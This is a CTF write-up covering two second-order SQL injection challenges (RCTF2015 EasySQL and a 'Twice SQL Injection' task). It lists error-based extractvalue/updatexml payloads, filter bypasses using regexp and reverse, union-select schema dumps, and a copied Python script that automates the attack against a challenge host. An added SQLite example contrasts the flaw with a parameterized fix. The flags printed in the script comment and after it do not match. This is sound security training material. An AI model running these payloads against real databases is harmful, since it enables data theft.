BUUCTF(40)


[RCTF2015]EasySQL

Two pages, register and login, so a second-order injection seems likely.

Testing shows that registering the user `admin"` and then submitting the change-password page produces an error:

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"admin"" and pwd='202cb962ac59075b964b07152d234b70'' at line 1

That is the injection point.

The SQL statement is presumably:

update 表 set password='xxx' where username='xx' and pwd='xx'
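The guessed statement above is the whole root cause: registration stores the username safely, but the change-password step reads it back and concatenates it into the UPDATE. As an added example (not code from the write-up or the challenge), the following Python reproduces that pattern against an in-memory SQLite table with the write-up's column names (single-quoted literals are used because SQLite lacks MySQL's double-quoted strings) and shows the parameterized version beside it:

```python
import hashlib
import sqlite3

# Constructed in-memory stand-in for the challenge's `users` table,
# with the column names the write-up recovered (name, pwd, email).
SCHEMA = "CREATE TABLE users (name TEXT, pwd TEXT, email TEXT)"


def md5(s):
    # md5("123") is 202cb962ac59075b964b07152d234b70, the hash in the error message
    return hashlib.md5(s.encode()).hexdigest()


def setup():
    conn = sqlite3.connect(":memory:")
    conn.execute(SCHEMA)
    # Registration itself is parameterized, so a username containing a quote
    # is stored verbatim; the flaw only surfaces when it is reused later.
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)",
                     [("admin", md5("123"), "a@example"),
                      ("admin'", md5("123"), "b@example")])
    return conn


def change_pwd_vulnerable(conn, username, oldpass, newpass):
    # Second-order flaw: the stored username is interpolated into the UPDATE,
    # mirroring the statement shape guessed in the write-up.
    sql = ("UPDATE users SET pwd='%s' WHERE name='%s' AND pwd='%s'"
           % (md5(newpass), username, md5(oldpass)))
    return conn.execute(sql).rowcount


def change_pwd_fixed(conn, username, oldpass, newpass):
    # Placeholders keep the username as data, however many quotes it contains.
    cur = conn.execute("UPDATE users SET pwd=? WHERE name=? AND pwd=?",
                       (md5(newpass), username, md5(oldpass)))
    return cur.rowcount


def demo(username):
    """Return (vulnerable outcome, rows updated by the fixed version)."""
    try:
        vuln = change_pwd_vulnerable(setup(), username, "123", "1234")
    except sqlite3.OperationalError:
        vuln = "syntax error"  # the quote broke the statement, as on the page
    fixed = change_pwd_fixed(setup(), username, "123", "1234")
    return vuln, fixed


if __name__ == "__main__":
    print(demo("admin"), demo("admin'"))
```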

What follows is error-based injection. Testing shows the registered username filters spaces, `and`, `or` and `/`.

Spaces can be bypassed with `()`.

`and` and `or` can be bypassed with `||` and `&&`.

Test statement:

admin"||extractvalue(1,concat(0x7e,user(),0x7e))#

Data came back, so this works.

admin"||extractvalue(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where(table_name)='users'),0x7e))#
name,pwd,email,real_flag_1s_her

A few more queries of this kind show that the flag is in the users table.

Trying mid, substr, left and right to extract the characters that were not displayed fails; they are filtered.

This challenge tests using a regular expression to select characters:

    select * from test where name regexp '^r'
admin"||extractvalue(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where(table_name)=('users')%26%26(column_name)regexp('^r')),0x7e))#
real_flag_1s_here
admin"||extractvalue(1,concat(0x7e,(select(group_concat(real_flag_1s_here))from(users)where(real_flag_1s_here)regexp('^f')),0x7e))#

The reverse() function reverses the string:

admin"||extractvalue(1,concat(0x7e,reverse((select(group_concat(real_flag_1s_here))from(users)where(real_flag_1s_here)regexp('^f'))),0x7e))#

That completes the challenge. Looking around online, I found that someone had written a script for it; pasting it here since it may come in handy later.

import requests

session = requests.session()
url = 'http://38316b97-1349-4dde-9c4c-8a40ed08d21e.node4.buuoj.cn:81/register.php'

# Dump databases
#name = 'test"||(updatexml(1,concat(0x3a,(select(group_concat(schema_name))from(information_schema.schemata))),1))#'

# Dump tables
#name = 'test"^updatexml(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where(table_schema=database()))),1)#'

# Dump column names (the flag column name obtained the first time is not the complete name)
#name = 'test"^updatexml(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where(table_name="flag"))),1)#'

# Use regexp to dump the complete column name
#name = 'test"^updatexml(1,concat(0x3a,(select(group_concat(column_name))from(information_schema.columns)where(table_name="users")&&(column_name)regexp("^r"))),1)#'

# Dump data (the updatexml error shows only 20 characters, so the other half still has to be displayed)
#name = 'username=mochu7"||(updatexml(1,concat(0x3a,(select(group_concat(real_flag_1s_here))from(users)where(real_flag_1s_here)regexp("^f"))),1))#'

# Output it once more in reverse order
name = 'test"^updatexml(1,concat(0x3a,reverse((select(group_concat(real_flag_1s_here))from(users)where(real_flag_1s_here)regexp("^f")))),1)#'

#}4af6e7d54142   -ed3a-0784-720f-a7
#flag{eb26f47a-f027-4870-a3de-24145d7e6fa4}

# Step 1: register with the payload as the username
data1 = {
    'username': name,
    'password': '123',
    'email': '123'
}
req1 = session.post(url, data=data1)

# Step 2: log in as that user
url2 = 'http://38316b97-1349-4dde-9c4c-8a40ed08d21e.node4.buuoj.cn:81/login.php'
data2 = {
    'username': name,
    'password': '123'
}
req2 = session.post(url2, data=data2)

# Step 3: change the password; the stored username is reused in the UPDATE and the error is returned
url3 = 'http://38316b97-1349-4dde-9c4c-8a40ed08d21e.node4.buuoj.cn:81/changepwd.php'
data3 = {
    'newpass': '1234',
    'oldpass': '123'
}
req3 = session.post(url3, data=data3)
print(req3.text)


flag{c3b0de7a-8919-49ec-9311-ffe8462851fc}

Joining the two halves gives the flag.

October 2019 Twice SQL Injection

Also a second-order injection, and also a very simple page, somewhat simpler than the previous one.

XINO' union select database() #

The registration form is injectable.

XINO' union select group_concat(table_name) from information_schema.tables where table_schema='ctftraining' #


XINO' union select group_concat(column_name) from information_schema.columns where table_name='flag'#


XINO' union select flag from flag #

Running these in order is all it takes.